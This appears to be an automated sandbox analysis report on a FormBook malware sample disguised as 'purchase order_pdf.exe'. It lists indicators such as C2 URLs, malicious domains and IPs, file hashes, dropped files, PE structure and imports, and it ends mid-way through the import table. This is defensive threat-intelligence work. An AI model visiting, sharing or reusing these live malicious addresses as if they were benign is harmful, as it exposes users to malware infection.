37.9.175.173	arrival notice_pdf.exe	Get hash	malicious	FormBook	Browse	www.gymroom.online/9v4b/?CbPtaF=QwF7JlY1PSjHVra/0S8TBTTWqpr20fcPe3Kcc1HOimPCQG1R1SgxoF7twkiq9lSaXC7xRVtY7bcnqH/14lNe4iuhLUoUSvgnHPLdNfgr71ArizSeHiw42Bs=&NV=CzkTp6UpmNmd

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.evoolihubs.shop	PO454355 Pdf.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	Quotation List Pdf.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	arrival notice_pdf.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	AirWaybill_Document Pdf.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
www.noghteyab.com	arrival notice_pdf.exe	Get hash	malicious	FormBook	Browse	51.89.93.193
www.shaf-kupe-msk.store	arrival notice_pdf.exe	Get hash	malicious	FormBook	Browse	45.130.41.38
www.gymroom.online	arrival notice_pdf.exe	Get hash	malicious	FormBook	Browse	37.9.175.173
www.hectmalt.xyz	arrival notice_pdf.exe	Get hash	malicious	FormBook	Browse	203.161.41.207
www.sodnavisystem.com	arrival notice_pdf.exe	Get hash	malicious	FormBook	Browse	162.43.94.40

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	475bc80ba1e4ac7b2f40f2a3e1a677a2ccf1ad7f5e5d5.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	188.114.96.3
	https://share.hsforms.com/1Em8WQwu9QQy0evAOGJf5Hwrp5zw	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=y8WYKByhAE-PQmCpBHM28YWYrIrntjdJiNDbsLTiwthUQkZBN1lDSlFUUVU4Vjg2UFBMTkRDU1g2Ri4u	Get hash	malicious	Unknown	Browse	188.114.96.3
	BL INV PACKING LIST.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	setup.exe	Get hash	malicious	Babadeda, RHADAMANTHYS, RedLine	Browse	104.20.22.46
	https://www.google.com/url?q=https://emea.dcv.ms/yVXFxxztE3&source=gmail&ust=1720483584380000&usg=AOvVaw1biqMGcy1vpswd7dOhsiWR'	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://a6ad66b3.docsx.pages.dev/	Get hash	malicious	Unknown	Browse	172.67.173.197
	file.exe	Get hash	malicious	Amadey, Mars Stealer, Stealc, Vidar	Browse	172.64.41.3
	unrepellent.exe	Get hash	malicious	Simda Stealer	Browse	104.21.57.192
	PRE ALERT (HBL, MBL and D-N).xlsx.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
PARSONLINETehran-IRANIR	exe4.bin.bak.exe	Get hash	malicious	BlackMoon, GhostRat	Browse	5.78.93.88
	arm5-20240706-0316.elf	Get hash	malicious	Mirai	Browse	91.98.88.14
	botx.x86.elf	Get hash	malicious	Mirai	Browse	91.98.39.84
	f9DYXBf380.elf	Get hash	malicious	Mirai, Moobot	Browse	46.62.234.74
	http://www.instegeram.ir/	Get hash	malicious	Unknown	Browse	31.214.171.171
	http://insig.org	Get hash	malicious	Unknown	Browse	134.255.201.92
	http://insig.org	Get hash	malicious	Unknown	Browse	134.255.201.92
	RpHVKGndFL.elf	Get hash	malicious	Unknown	Browse	82.99.248.251
	Ud310iQZnO.elf	Get hash	malicious	Mirai	Browse	188.245.52.48
	QBv5s2bHnV.elf	Get hash	malicious	Unknown	Browse	91.98.52.67
CYBERTRAILSUS	Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe	Get hash	malicious	FormBook	Browse	162.43.101.114
	spec 4008670601 AZTEK Order.exe	Get hash	malicious	FormBook	Browse	162.43.101.114
	SOA 020724.exe	Get hash	malicious	FormBook	Browse	162.43.101.114
	Inquiry No PJO-4010574.exe	Get hash	malicious	FormBook	Browse	162.43.101.114
	arrival notice_pdf.exe	Get hash	malicious	FormBook	Browse	162.43.94.40
	288292021 ABB.exe	Get hash	malicious	FormBook	Browse	162.43.101.114
	RITS Ref 3379-06.exe	Get hash	malicious	FormBook	Browse	162.43.101.114
	NGL 3200-Phase 2- Strainer.exe	Get hash	malicious	FormBook	Browse	162.43.101.114
	M.R NO. 1212-00-RE-REQ-649-01.scr.exe	Get hash	malicious	FormBook	Browse	162.43.101.114
	Mbabane.exe	Get hash	malicious	FormBook	Browse	162.43.117.90
OVHFR	setup.exe	Get hash	malicious	Babadeda, RHADAMANTHYS, RedLine	Browse	164.132.58.105
	a9d098e9a73fa5f1240d7b00540fa54472863eac62df2.exe	Get hash	malicious	RedLine	Browse	51.81.126.51
	https://ransmonseversdapps.pages.dev/	Get hash	malicious	Unknown	Browse	54.38.113.2
	node.js.exe	Get hash	malicious	Unknown	Browse	151.80.29.83
	node.js.exe	Get hash	malicious	Unknown	Browse	151.80.29.83
	16EngN9Zwd.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse	139.99.67.238
	http://sectocarewl.online/mona-michelle/	Get hash	malicious	Unknown	Browse	149.56.240.27
	https://leightonpetroleum.com/	Get hash	malicious	Unknown	Browse	51.77.64.70
	https://instagrampro.net/	Get hash	malicious	Unknown	Browse	51.89.9.252
	http://multichaindappsx.pages.dev/	Get hash	malicious	Unknown	Browse	54.38.113.3

Process:	C:\Users\user\Desktop\purchase order_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	274432
Entropy (8bit):	7.9946644691713615
Encrypted:	true
SSDEEP:	6144:TAgXLZsLEuS/2rq6l7Dmw8/SAFOi/shnQNr2nDMC1f2Z1s:bXlDuzthDDCOAbuHO1s
MD5:	3676CBBD790ACFCF71736D9B5CF8B56A
SHA1:	2A19AC558FC22F3DF19B66C9EE1E33333DCB3E63
SHA-256:	0EF88D385CD8B2C0964ED934D1D29E9CB35C029F032B19B97FF690FB802FC333
SHA-512:	D6B060329079CE4DB82C55C2D38EC3F1A8D7F9373A0EF344849D88F9D66DF3CAC4936DE802694EB813DB8156117A23EA89A1AF28A517A4EEB065F90773050DA9
Malicious:	false
Reputation:	low
Preview:	.c\|..CHXI...^...y.KD...bNB...DCHXIK6JWOMC1EOKGP3GJMJ99YDCHX.K6JYP.M1.F.f.2..l.QPd3:7.9W'w,,-_;k%5.5?#jPWy...x$$R/yB@I.EOKGP3G3LC..9#.u8...0.W.u+ .)..vY^.^..u+Q..&.+.%(.GP3GJMJ9i.DC.YHKC...MC1EOKGP.GHLA82YD]LXIK6JWOMC.QOKG@3GJ}N99Y.CHHIK6HWOKC1EOKGP5GJMJ99YDsLXII6JWOMC3E..GP#GJ]J99YTCHHIK6JWO]C1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC.133P3G.QN99IDCHFMK6ZWOMC1EOKGP3GJMj999DCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6J

C:\Users\user\AppData\Local\Temp\aut50D3.tmp

Download File

Process:	C:\Users\user\Desktop\purchase order_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	11508
Entropy (8bit):	7.705247779424648
Encrypted:	false
SSDEEP:	192:H9Tyo1KvLclSfJgjLShrLDPKe5Iuil1Xz1jCvewEDdlNqs+9l5on1nKr7ChlLPrW:ZDETBWLUKyilNZjCveLlG9Yn1nKHChRW
MD5:	CA4EC2BFA23A8985748BAA09B2F31023
SHA1:	B7B6CF8B3BBB5575FAE5C35B1C09F7F28BD435C5
SHA-256:	CFABB75B8C624408653605297B14F24099FC06DDD6EDEC0C46F2EE648C666F0B
SHA-512:	415583396F22A37119BE83B2A31DA21C37E25858376C78A94693BAFB2C29FD86E3C77C7A7DE9623C6B61F19BBFCD937B1E652C6CD57722B4D6F2662F0F4030E4
Malicious:	false
Reputation:	low
Preview:	EA06..........w...gx.>./...`7\]....+c@..w.!.......................jb@.z..c8xp...........+...X.o..$b...8.p.......0..........@.....1.\.....d..:......0....p..._..vr."..#..}...6...1.<x.:.J..h.CX.....!..t.B.....C.....D..z..w........p...&..1.._....9.`.... ........!...<..t B>..........'.0.....D.N...h.;.GY.,..1.w@1.@..j.=. <...x..L..c..\.........wq.....&@.s..r........p......r.L...........9\|.......;.9...../..u..O.&....:}@.........op.....q..].... @Z.p....`.$.%.....i. ..9c...qw....V..j..\|......L........p._ ....&....[.X.......@...........\| 9........,.p.n..o .'.`.......[...........8}.gz....W,......."8.?...cAh?. P......k.. ...&...B...$.....o8.....W....Nt....\l.......x..............-2.+.)... ->.. ...x.....u.w?......... ...0.;... @)......T.....m.(.W....!....b..V. ......k.. d.-...%..8..X....z....:.U.B\|../_.......+........E...L............ ..._..p...]..XK..=4....`...$@.\p.........O.%........Ib...PPm..k.....\. 6..a....0...<.....#@a..P./.T.....@\..X......U..Op....}...@.6@.'..\...*O...

C:\Users\user\AppData\Local\Temp\maneuverability

Download File

Process:	C:\Users\user\Desktop\purchase order_pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	274432
Entropy (8bit):	7.9946644691713615
Encrypted:	true
SSDEEP:	6144:TAgXLZsLEuS/2rq6l7Dmw8/SAFOi/shnQNr2nDMC1f2Z1s:bXlDuzthDDCOAbuHO1s
MD5:	3676CBBD790ACFCF71736D9B5CF8B56A
SHA1:	2A19AC558FC22F3DF19B66C9EE1E33333DCB3E63
SHA-256:	0EF88D385CD8B2C0964ED934D1D29E9CB35C029F032B19B97FF690FB802FC333
SHA-512:	D6B060329079CE4DB82C55C2D38EC3F1A8D7F9373A0EF344849D88F9D66DF3CAC4936DE802694EB813DB8156117A23EA89A1AF28A517A4EEB065F90773050DA9
Malicious:	false
Reputation:	low
Preview:	.c\|..CHXI...^...y.KD...bNB...DCHXIK6JWOMC1EOKGP3GJMJ99YDCHX.K6JYP.M1.F.f.2..l.QPd3:7.9W'w,,-_;k%5.5?#jPWy...x$$R/yB@I.EOKGP3G3LC..9#.u8...0.W.u+ .)..vY^.^..u+Q..&.+.%(.GP3GJMJ9i.DC.YHKC...MC1EOKGP.GHLA82YD]LXIK6JWOMC.QOKG@3GJ}N99Y.CHHIK6HWOKC1EOKGP5GJMJ99YDsLXII6JWOMC3E..GP#GJ]J99YTCHHIK6JWO]C1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC.133P3G.QN99IDCHFMK6ZWOMC1EOKGP3GJMj999DCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6JWOMC1EOKGP3GJMJ99YDCHXIK6J

C:\Users\user\AppData\Local\Temp\orographically

Download File

Process:	C:\Users\user\Desktop\purchase order_pdf.exe
File Type:	Unicode text, UTF-8 text, with very long lines (28674), with no line terminators
Category:	dropped
Size (bytes):	58260
Entropy (8bit):	3.5210401404275107
Encrypted:	false
SSDEEP:	1536:hQRHK9xUtQL+Ft3Rwo353umHCa5gqZOZk:hQtK9xUtQL+Ft3Rwo353umHCa5gqZOZk
MD5:	80E6605CFC96833E0775B77DA0A12C96
SHA1:	D37813C335F824B83025F710DCB824B60BAB1DB0
SHA-256:	07518E0803EE297200390AD751E941A58954E9194EAD64E57745AAC4FF38F05A
SHA-512:	080313D4E484899ADC5BF393FCA105C1C1E3D8490EB504A093C45F0AA5CA56CBBC22E6C1BA09C447C6BB2D184353B812FA8F5C7959C72E96DFCA56BC1A4A332A
Malicious:	false
Reputation:	low
Preview:	.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\x1j09f428

Download File

Process:	C:\Windows\SysWOW64\isoburn.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.122436907614961
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	purchase order_pdf.exe
File size:	1'172'992 bytes
MD5:	83256eb2c9ef7f753415482f83d9de5f
SHA1:	291d887c77b83ac8b9cfdcaa83ad21e73d848e2a
SHA256:	b120ca208b2c4d598b7bfd471db7dfd89eda1403c0197424cda17b321492bcef
SHA512:	53985e558247e8ec81d568454464d282509a33ee241dda9c096640547d7f5ad6239dac419de6c8641f8e475ea1faf7c0bc5e3ae12f3bad499c25d4a248932db1
SSDEEP:	24576:5AHnh+eWsN3skA4RV1Hom2KXMmHazV3WqmwVJ6+hX65:Ah+ZkldoPK8Yaz6wf6+hA
TLSH:	4D45BD0273D1C036FFABA2739B6AB60156BD79254133852F13981DB9BD701B2273E663
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x42800a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x668B21F7 [Sun Jul 7 23:17:11 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007FE98530AD7Dh
jmp 00007FE9852FDB34h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FE9852FDCBAh
cmp edi, eax
jc 00007FE9852FE01Eh
bt dword ptr [004C41FCh], 01h
jnc 00007FE9852FDCB9h
rep movsb
jmp 00007FE9852FDFCCh
cmp ecx, 00000080h
jc 00007FE9852FDE84h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FE9852FDCC0h
bt dword ptr [004BF324h], 01h
jc 00007FE9852FE190h
bt dword ptr [004C41FCh], 00000000h
jnc 00007FE9852FDE5Dh
test edi, 00000003h
jne 00007FE9852FDE6Eh
test esi, 00000003h
jne 00007FE9852FDE4Dh
bt edi, 02h
jnc 00007FE9852FDCBFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FE9852FDCC3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FE9852FDD15h
bt esi, 03h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD5 build 40629
[RES] VS2013 build 21005
[LNK] VS2013 UPD5 build 40629

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbc0cc	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc8000	0x53f88	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x11c000	0x7134	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4b50	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dfdd	0x8e000	310e36668512d53489c005622bb1b4a9	False	0.5735602580325704	data	6.675248351711057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2fd8e	0x2fe00	748cf1ab2605ce1fd72d53d912abb68f	False	0.32828818537859006	data	5.763244005758284	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbf000	0x8f74	0x5200	aae9601d920f07080bdfadf43dfeff12	False	0.1017530487804878	data	1.1963819235530628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc8000	0x53f88	0x54000	7388d8e9779a3da3e835d7eb986bccc0	False	0.9218953450520834	data	7.879753581635644	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x11c000	0x7134	0x7200	f04128ad0f87f42830e4a6cdbc38c719	False	0.7617530153508771	data	6.783955557128661	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc85a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc86d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc87f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc8920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc8c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc8d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc9bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xca480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xca9e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xccf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xce038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xce4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xce4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcea84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcf110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcf5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcfb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xd01f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xd0660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xd07b8	0x4b24e	data			1.000328145813704
RT_GROUP_ICON	0x11ba08	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x11ba80	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x11ba94	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x11baa8	0x14	data	English	Great Britain	1.25
RT_VERSION	0x11babc	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x11bb98	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, 